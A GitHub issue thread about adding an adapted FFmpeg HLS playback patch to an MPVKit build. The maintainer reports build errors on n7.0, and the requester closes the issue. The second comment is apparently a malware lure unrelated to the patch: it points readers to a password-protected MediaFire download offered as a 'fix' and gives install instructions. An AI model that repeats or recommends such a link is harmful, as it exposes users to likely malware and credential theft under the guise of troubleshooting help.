### ISSUE TITLE
Add patch to FFmpeg

### ISSUE THREAD

**Issue by stonerl** [mpvkit/MPVKit#10]
There is a [patch](https://ffmpeg.org/pipermail/ffmpeg-devel/2020-April/261343.html) for FFmpeg, that should resolve some issues with HLS playback. It never made it into mainline for some reason.

I adapted the patch for the latest FFmpeg release. Would you be so kind and add this patch to your FFmpeg build?

Here is the patch:

[0001-fix-hls.patch](https://github.com/user-attachments/files/16755541/0001-fix-hls.patch)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cxfksword** [comment]
This patch  many build error on n7.0.

[build log](https://productionresultssa6.blob.core.windows.net/actions-results/531b6541-fb87-48de-a99d-1301203c3ae4/workflow-job-run-ca395085-040a-526b-2ce8-bdc85f692774/logs/job/job-logs.txt?rsct=text%2Fplain&se=2024-08-27T13%3A52%3A49Z&sig=rP9qRG1gb235%2Bl1QduqBvEt%2Bch0szU9pSk0OFmA4huI%3D&ske=2024-08-28T01%3A01%3A27Z&skoid=ca7593d4-ee42-46cd-af88-8b886a2f84eb&sks=b&skt=2024-08-27T13%3A01%3A27Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2024-05-04&sp=r&spr=https&sr=b&st=2024-08-27T13%3A42%3A44Z&sv=2024-05-04)

**Comment by stonerl** [comment]
Hmm, yeah. That is indeed unfortunate and my bad. Im closing this one for the time being, sorry for wasting your time one this. Totally my fault.
